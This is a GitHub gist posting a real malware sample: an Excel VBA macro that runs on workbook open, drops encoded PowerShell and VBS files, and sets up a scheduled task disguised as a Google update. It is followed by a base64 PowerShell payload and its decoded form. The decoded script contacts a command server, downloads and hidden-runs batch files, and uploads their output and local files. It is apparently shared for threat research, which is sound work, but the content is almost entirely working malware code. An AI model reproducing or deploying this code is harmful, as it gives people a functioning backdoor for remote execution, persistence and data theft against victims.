Created
October 23, 2016 00:12
-
-
Save anonymous/d0da355e5c21a122866808d37234cd5d to your computer and use it in GitHub Desktop.
PowerShell malware [posted by @JohnLaTwC]
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //sample: 1554e74b935a61d446cb634f80d7d1e200e864bc | |
| //posted by @JohnLaTwC | |
| // Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html | |
| ----------------------------------------------- macro ---------------------------------- | |
| Private Sub Workbook_Open() | |
| Call doom_Init | |
| Call doom_ShowHideSheets | |
| End Sub | |
| Sub doom_ShowHideSheets() | |
| If ActiveWorkbook.Worksheets(1).Visible Then | |
| Dim WS_Count As Integer | |
| Dim I As Integer | |
| WS_Count = ActiveWorkbook.Worksheets.Count | |
| For I = 1 To WS_Count | |
| ActiveWorkbook.Worksheets(I).Visible = True | |
| Next I | |
| ActiveWorkbook.Worksheets(1).Visible = False | |
| ActiveWorkbook.Worksheets(2).Activate | |
| End If | |
| End Sub | |
| Sub doom_Init() | |
| Set BackupVbs = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 24) | |
| Set DnEPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 25) | |
| Set DnSPs1 = ActiveWorkbook.Worksheets("Incompatible").Cells(1, 26) | |
| Set wss = CreateObject("WScript.Shell") | |
| Set fso = CreateObject("Scripting.FileSystemObject") | |
| pth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\Libraries\RecordedTV\" | |
| If Not (fso.FolderExists(pth)) Then | |
| fso.CreateFolder (pth) | |
| End If | |
| cmd = "powershell ""&{$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & BackupVbs & "')); Set-Content '" & pth & "backup.vbs" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnEPs1 & "'));$f=$f -replace '__',(Get-Random);$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""'; Set-Content '" & pth & "DnE.ps1" & "' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBas" & "e64String('" & DnSPs1 & "'));$f='powershell -EncodedCommand \""'+([System.Convert]::ToBas" & "e64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\""';Set-Content '" & pth & "DnS.ps1" & "' $f}""" | |
| cmd2 = "schtasks /create /F /sc minute /mo 3 /tn " & Chr(34) & "GoogleUpdateTasksMachineUI" & Chr(34) & " /tr " & pth & "backup.vbs" | |
| If Not (fso.FileExists(pth & "backup.vbs")) Then | |
| If Not (fso.FolderExists(pth & "up")) Then | |
| fso.CreateFolder (pth & "up") | |
| End If | |
| If Not (fso.FolderExists(pth & "dn")) Then | |
| fso.CreateFolder (pth & "dn") | |
| End If | |
| If Not (fso.FolderExists(pth & "tp")) Then | |
| fso.CreateFolder (pth & "tp") | |
| End If | |
| wss.Run cmd, 0 | |
| wss.Run cmd2, 0 | |
| Set wss = Nothing | |
| Set fso = Nothing | |
| End If | |
| End Sub | |
| ----------------------------------------------- DnE.ps1 ---------------------------------- | |
| powershell -EncodedCommand "JABNAFkASABPAE0ARQAgAD0AIAAkAEUAbgB2ADoAUAB1AGIAbABpAGMAKwAiAFwATABpAGIAcgBhAHIAaQBlAHMAXABSAGUAYwBvAHIAZABlAGQAVABWAFwAIgA7AA0ACgAkAFMARQBSAFYARQBSACAAPQAgACIAaAB0AHQAcAA6AC8ALwBtAGEAaQBuAC0AZwBvAG8AZwBsAGUALQByAGUAcwBvAGwAdgBlAHIALgBjAG8AbQAvAGkAbgBkAGUAeAAuAGEAcwBwAHgAPwBpAGQAPQAxADgANQA4ADgANAA3ADkAOAA3AFwAIgA7AA0ACgAkAFUAUAAgAD0AIAAiAHUAcABcACIAOwANAAoAJABEAE4AIAA9ACAAIgBkAG4AXAAiADsADQAKACQAVABQACAAPQAgACIAdABwAFwAIgA7AA0ACgAkAFUAUABMAEsAIAA9ACAAIgB1AHAAbABvAGMAawAiADsADQAKACQARABOAEwASwAgAD0AIAAiAGQAdwBuAGwAbwBjAGsAIgA7AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABpAG4AawAsACAAJABwAGEAdABoACkADQAKAHsADQAKAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJACQAdwBjAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAJAB0AHIAdQBlADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0ACcALAAnACoALwAqACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEwAYQBuAGcAdQBhAGcAZQAnACwAJwBlAG4ALQBVAFMALABlAG4AOwBxAD0AMAAuADUAJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ARQBuAGMAbwBkAGkAbgBnACcALAAnAGcAegBpAHAALAAgAGQAZQBmAGwAYQB0AGUAJwApADsADQAKAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUAByAGEAZwBtAGEAJwAsACcAbgBvAC0AYwBhAGMAaABlACcAKQA7AA0ACgAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBDAGEAYwBoAGUALQBDAG8AbgB0AHIAbwBsACcALAAnAG4AbwAtAGMAYQBjAGgAZQAnACkAOwANAAoACQAkAHIAIAA9ACAARwBlAHQALQBSAGEAbgBkAG8AbQA7AA0ACgAJACQAZgBpAGwAZQAgAD0AIAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAcgA7AA0ACgAJAHQAcgB5AA0ACgAJAHsADQAKAAkACQAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAGkAbgBrACwAJABmAGkAbABlACkAOwANAAoACQB9AA0ACgAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkAewANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBSAGUAZgBlAHIAZQByACcALAAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGcAbwBvAGcAbABlAC4AYwBvAG0AJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdACAAPQAgACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADMAOwAgAFcAaQBuADYANAA7ACAAeAA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsADQAKAAkACQB0AHIAeQANAAoACQAJAHsADQAKAAkACQAJACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAaQBuAGsALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkAfQANAAoACQAJAGMAYQB0AGMAaAANAAoACQAJAHsADQAKAAkACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwANAAoACQAJAH0ADQAKAAkAfQANAAoACQAkAGMAZAAgAD0AIAAkAHcAYwAuAFIAZQBzAHAAbwBuAHMAZQBIAGUAYQBkAGUAcgBzAFsAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuACcAXQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAYwBkAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAZAAuAEkAbgBkAGUAeABPAGYAKAAnAGYAaQBsAGUAbgBhAG0AZQA9ACcAKQArADkAKQA7AA0ACgAJACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGYAaQBsAGUAbgBhAG0AZQAuAFIAZQBwAGwAYQBjAGUAKAAnAC0AJwAsACcALwAnACkAKQApADsADQAKAAkAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAKAAoACQAcABhAHQAaAAuAFQAcgBpAG0ARQBuAGQAKAAnAFwAJwApACkAKwAnAFwAJwArACQAZgBpAGwAZQBuAGEAbQBlACkAIAAtAFYAYQBsAHUAZQAgACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABmAGkAbABlACkAKQApACAALQBFAG4AYwBvAGQAaQBuAGcAIABCAHkAdABlADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlACAALQBGAG8AcgBjAGUAOwANAAoACQByAGUAdAB1AHIAbgAgACgAKAAkAHAAYQB0AGgALgBUAHIAaQBtAEUAbgBkACgAJwBcACcAKQApACsAJwBcACcAKwAkAGYAaQBsAGUAbgBhAG0AZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AVABoAGUAbQBBAGwAbAANAAoAewANAAoACQBpAGYAKAAtAG4AbwB0ACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwApACkADQAKAAkAewANAAoACQAJAE4AZQB3AC0ASQB0AGUAbQAgACQATQBZAEgATwBNAEUAJABEAE4ATABLACAALQB0AHkAcABlACAAZgBpAGwAZQA7AA0ACgAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAHcAaABpAGwAZQAoACQAaQAgAC0AbABlACAAMwApAA0ACgAJAAkAewANAAoACQAJAAkAdAByAHkADQAKAAkACQAJAHsADQAKAAkACQAJAAkARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGQAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgADQAKAAkACQAJAHsADQAKAAkACQAJAAkAYgByAGUAYQBrADsADQAKAAkACQAJAH0ADQAKAAkACQAJACQAaQArACsAOwANAAoACQAJAH0ADQAKAAkACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOAEwASwAgAC0ARgBvAHIAYwBlADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAZgBpAGwAZQApAA0ACgB7AA0ACgAJAGkAZgAoACgARwBlAHQALQBJAHQAZQBtACAAKAAkAGYAaQBsAGUAKQApAC4AbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQANAAoACQB7AA0ACgAJAAkAJAB3AGMAIAA9ACAAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AA0ACgAJAAkAJAB3AGMALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIAAkAHQAcgB1AGUAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAnACwAJwAqAC8AKgAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAAQgBJAFQAUwAvADcALgA3ACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAEEAYwBjAGUAcAB0AC0ATABhAG4AZwB1AGEAZwBlACcALAAnAGUAbgAtAFUAUwAsAGUAbgA7AHEAPQAwAC4ANQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBBAGMAYwBlAHAAdAAtAEUAbgBjAG8AZABpAG4AZwAnACwAJwBnAHoAaQBwACwAIABkAGUAZgBsAGEAdABlACcAKQA7AA0ACgAJAAkAJAB3AGMALgBIAGUAYQBkAGUAcgBzAC4AYQBkAGQAKAAnAFIAZQBmAGUAcgBlAHIAJwAsACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AZwBvAG8AZwBsAGUALgBjAG8AbQAnACkAOwANAAoACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwAuAGEAZABkACgAJwBQAHIAYQBnAG0AYQAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQwBhAGMAaABlAC0AQwBvAG4AdAByAG8AbAAnACwAJwBuAG8ALQBjAGEAYwBoAGUAJwApADsADQAKAAkACQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABmAGkAbABlACkAKQApACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQAZgBpAGwAZQAgAC0ARQBuAGMAbwBkAGkAbgBnACAARABlAGYAYQB1AGwAdAA7AA0ACgAJAAkAJABpAD0AMQA7AA0ACgAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQB7AA0ACgAJAAkACQB0AHIAeQANAAoACQAJAAkAewANAAoACQAJAAkACQAkAHcAYwAuAFUAcABsAG8AYQBkAEYAaQBsAGUAKAAkAFMARQBSAFYARQBSACsAJwB1ACcALAAkAGYAaQBsAGUAKQA7AA0ACgAJAAkACQAJAGIAcgBlAGEAawA7AA0ACgAJAAkACQB9AA0ACgAJAAkACQBjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQBjAG8AbgB0AGkAbgB1AGUAOwANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkACQANAAoACQAJAGkAZgAgACgAJABpACAALQBlAHEAIAA0ACkADQAKAAkACQB7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAUgBlAGYAZQByAGUAcgAnACwAJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBnAG8AbwBnAGwAZQAuAGMAbwBtACcAKQA7AA0ACgAJAAkACQAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBhAGQAZAAoACcAQQBjAGMAZQBwAHQAJwAsACcAKgAvACoAJwApADsADQAKAAkACQAJACQAdwBjAC4ASABlAGEAZABlAHIAcwBbACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnAF0AIAA9ACAAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMwA7ACAAVwBpAG4ANgA0ADsAIAB4ADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwANAAoACQAJAAkAJABpACAAPQAgADEAOwANAAoACQAJAAkAdwBoAGkAbABlACgAJABpACAALQBsAGUAIAAzACkADQAKAAkACQAJAHsADQAKAAkACQAJAAkAdAByAHkADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAdwBjAC4AVQBwAGwAbwBhAGQARgBpAGwAZQAoACQAUwBFAFIAVgBFAFIAKwAnAHUAJwAsACQAZgBpAGwAZQApADsADQAKAAkACQAJAAkACQBiAHIAZQBhAGsAOwANAAoACQAJAAkACQB9AA0ACgAJAAkACQAJAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEUAeABjAGUAcAB0AGkAbwBuAF0ADQAKAAkACQAJAAkAewANAAoACQAJAAkACQAJACQAaQArACsAOwANAAoACQAJAAkACQAJAGMAbwBuAHQAaQBuAHUAZQA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAdwBhAGkAdABmAG8AcgAgAHUAcABsAHAAcgBvAGMAIAAvAFQAIAAxADsADQAKAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABmAGkAbABlADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAFUAcABUAGgAZQBtAEEAbABsAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAATABLACkAKQANAAoACQB7AA0ACgAJAAkATgBlAHcALQBJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAIAAtAHQAeQBwAGUAIABmAGkAbABlADsADQAKAAkACQBHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUAAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAewB0AHIAeQB7AFUAcABsAG8AYQBkAEYAaQBsAGUAUgBlAG0AbwB2AGUAIAAoACQAXwAuAEYAdQBsAGwATgBhAG0AZQApAH0AYwBhAHQAYwBoAHsAYwBvAG4AdABpAG4AdQBlAH0AfQA7AA0ACgAJAAkAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAJABNAFkASABPAE0ARQAkAFUAUABMAEsAIAAtAEYAbwByAGMAZQA7AA0ACgAJAH0ADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwB3AG4AbABvAGEAZABFAHgAZQBjAHUAdABlAA0ACgB7AA0ACgAJAHQAcgB5AA0ACgAJAHsADQAKAAkACQAkAGIAYQB0AGYAaQBsAGUAIAA9ACAARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAIAAoACQAUwBFAFIAVgBFAFIAKwAnAGIAJwApACAAKAAkAE0AWQBIAE8ATQBFACsAJABEAE4AKQA7AA0ACgAJAH0ADQAKAAkAYwBhAHQAYwBoAA0ACgAJAHsADQAKAAkACQByAGUAdAB1AHIAbgA7AA0ACgAJAH0ADQAKAAkAJABhAHIAZwBzAD0AIgAvAGMAIAAiACsAJABiAGEAdABmAGkAbABlACsAIgAgAD4AIAAiACsAJABiAGEAdABmAGkAbABlACsAIgAuAHQAeAB0ACIAOwANAAoACQBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0ARgBpAGwAZQBQAGEAdABoACAAYwBtAGQAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABhAHIAZwBzADsADQAKAAkAVQBwAGwAbwBhAGQARgBpAGwAZQBSAGUAbQBvAHYAZQAoACQAYgBhAHQAZgBpAGwAZQArACcALgB0AHgAdAAnACkAOwANAAoACQBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAoACQAYgBhAHQAZgBpAGwAZQApADsADQAKAH0ADQAKAA0ACgANAAoADQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgBpAHQAQwBoAGUAYwBrAA0ACgB7AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABEAE4AKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQARABOACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABVAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVQBQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgAJAGkAZgAoAC0AbgBvAHQAKABUAGUAcwB0AC0AUABhAHQAaAAgACQATQBZAEgATwBNAEUAJABUAFAAKQApAA0ACgAJAHsADQAKAAkACQBOAGUAdwAtAEkAdABlAG0AIAAkAE0AWQBIAE8ATQBFACQAVABQACAALQB0AHkAcABlACAAZABpAHIAZQBjAHQAbwByAHkAOwANAAoACQB9AA0ACgB9AA0ACgANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAGwAaQB2AGUADQAKAHsADQAKAAkASQBuAGkAdABDAGgAZQBjAGsAOwANAAoACQBEAG8AdwBuAFQAaABlAG0AQQBsAGwAOwANAAoACQBEAG8AdwBuAGwAbwBhAGQARQB4AGUAYwB1AHQAZQA7AA0ACgAJAFUAcABUAGgAZQBtAEEAbABsADsADQAKAH0ADQAKAA0ACgANAAoADQAKAEEAbABpAHYAZQA7AA0ACgA=" | |
| decodes to: | |
| $MYHOME = $Env:Public+"\Libraries\RecordedTV\"; | |
| $SERVER = "http://main-google-resolver.com/index.aspx?id=1858847987\"; | |
| $UP = "up\"; | |
| $DN = "dn\"; | |
| $TP = "tp\"; | |
| $UPLK = "uplock"; | |
| $DNLK = "dwnlock"; | |
| function DownloadFile($link, $path) | |
| { | |
| $wc = new-object System.Net.WebClient; | |
| $wc.UseDefaultCredentials = $true; | |
| $wc.Headers.add('Accept','*/*'); | |
| $wc.Headers.add('User-Agent','Microsoft BITS/7.7'); | |
| $wc.Headers.add('Accept-Language','en-US,en;q=0.5'); | |
| $wc.Headers.add('Accept-Encoding','gzip, deflate'); | |
| $wc.Headers.add('Referer','https://www.google.com'); | |
| $wc.Headers.add('Pragma','no-cache'); | |
| $wc.Headers.add('Cache-Control','no-cache'); | |
| $r = Get-Random; | |
| $file = ($path.TrimEnd('\'))+'\'+$r; | |
| try | |
| { | |
| $wc.DownloadFile($link,$file); | |
| } | |
| catch [System.Net.WebException] | |
| { | |
| $wc.Headers.add('Referer','https://www.google.com'); | |
| $wc.Headers.add('Accept','*/*'); | |
| $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'; | |
| try | |
| { | |
| $wc.DownloadFile($link,$file); | |
| } | |
| catch | |
| { | |
| throw [System.Net.WebException] $_.Exception.ToString(); | |
| } | |
| } | |
| $cd = $wc.ResponseHeaders['Content-Disposition']; | |
| $filename = $cd.Substring($cd.IndexOf('filename=')+9); | |
| $filename = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($filename.Replace('-','/'))); | |
| Set-Content -Path (($path.TrimEnd('\'))+'\'+$filename) -Value ([System.Convert]::FromBase64String((Get-Content -Path $file))) -Encoding Byte; | |
| Remove-Item $file -Force; | |
| return (($path.TrimEnd('\'))+'\'+$filename); | |
| } | |
| function DownThemAll | |
| { | |
| if(-not(Test-Path $MYHOME$DNLK)) | |
| { | |
| New-Item $MYHOME$DNLK -type file; | |
| $i = 1; | |
| while($i -le 3) | |
| { | |
| try | |
| { | |
| DownloadFile ($SERVER+'d') ($MYHOME+$DN); | |
| } | |
| catch | |
| { | |
| break; | |
| } | |
| $i++; | |
| } | |
| Remove-Item $MYHOME$DNLK -Force; | |
| } | |
| } | |
| function UploadFileRemove($file) | |
| { | |
| if((Get-Item ($file)).length -gt 0) | |
| { | |
| $wc = new-object System.Net.WebClient; | |
| $wc.UseDefaultCredentials = $true; | |
| $wc.Headers.add('Accept','*/*'); | |
| $wc.Headers.add('User-Agent','Microsoft BITS/7.7'); | |
| $wc.Headers.add('Accept-Language','en-US,en;q=0.5'); | |
| $wc.Headers.add('Accept-Encoding','gzip, deflate'); | |
| $wc.Headers.add('Referer','https://www.google.com'); | |
| $wc.Headers.add('Pragma','no-cache'); | |
| $wc.Headers.add('Cache-Control','no-cache'); | |
| [System.Convert]::ToBase64String(([System.IO.File]::ReadAllBytes($file))) | Out-File $file -Encoding Default; | |
| $i=1; | |
| while($i -le 3) | |
| { | |
| try | |
| { | |
| $wc.UploadFile($SERVER+'u',$file); | |
| break; | |
| } | |
| catch [System.Net.WebException] | |
| { | |
| $i++; | |
| continue; | |
| } | |
| } | |
| if ($i -eq 4) | |
| { | |
| $wc.Headers.add('Referer','https://www.google.com'); | |
| $wc.Headers.add('Accept','*/*'); | |
| $wc.Headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'; | |
| $i = 1; | |
| while($i -le 3) | |
| { | |
| try | |
| { | |
| $wc.UploadFile($SERVER+'u',$file); | |
| break; | |
| } | |
| catch [System.Net.WebException] | |
| { | |
| $i++; | |
| continue; | |
| } | |
| } | |
| } | |
| } | |
| waitfor uplproc /T 1; | |
| Remove-Item $file; | |
| } | |
| function UpThemAll | |
| { | |
| if(-not(Test-Path $MYHOME$UPLK)) | |
| { | |
| New-Item $MYHOME$UPLK -type file; | |
| Get-ChildItem $MYHOME$UP | ForEach-Object{try{UploadFileRemove ($_.FullName)}catch{continue}}; | |
| Remove-Item $MYHOME$UPLK -Force; | |
| } | |
| } | |
| function DownloadExecute | |
| { | |
| try | |
| { | |
| $batfile = DownloadFile ($SERVER+'b') ($MYHOME+$DN); | |
| } | |
| catch | |
| { | |
| return; | |
| } | |
| $args="/c "+$batfile+" > "+$batfile+".txt"; | |
| Start-Process -WindowStyle Hidden -Wait -FilePath cmd -ArgumentList $args; | |
| UploadFileRemove($batfile+'.txt'); | |
| Remove-Item ($batfile); | |
| } | |
| function InitCheck | |
| { | |
| if(-not(Test-Path $MYHOME$DN)) | |
| { | |
| New-Item $MYHOME$DN -type directory; | |
| } | |
| if(-not(Test-Path $MYHOME$UP)) | |
| { | |
| New-Item $MYHOME$UP -type directory; | |
| } | |
| if(-not(Test-Path $MYHOME$TP)) | |
| { | |
| New-Item $MYHOME$TP -type directory; | |
| } | |
| } | |
| function Alive | |
| { | |
| InitCheck; | |
| DownThemAll; | |
| DownloadExecute; | |
| UpThemAll; | |
| } | |
| Alive; | |
| ----------------------------------------------- DnE.ps1 ---------------------------------- | |
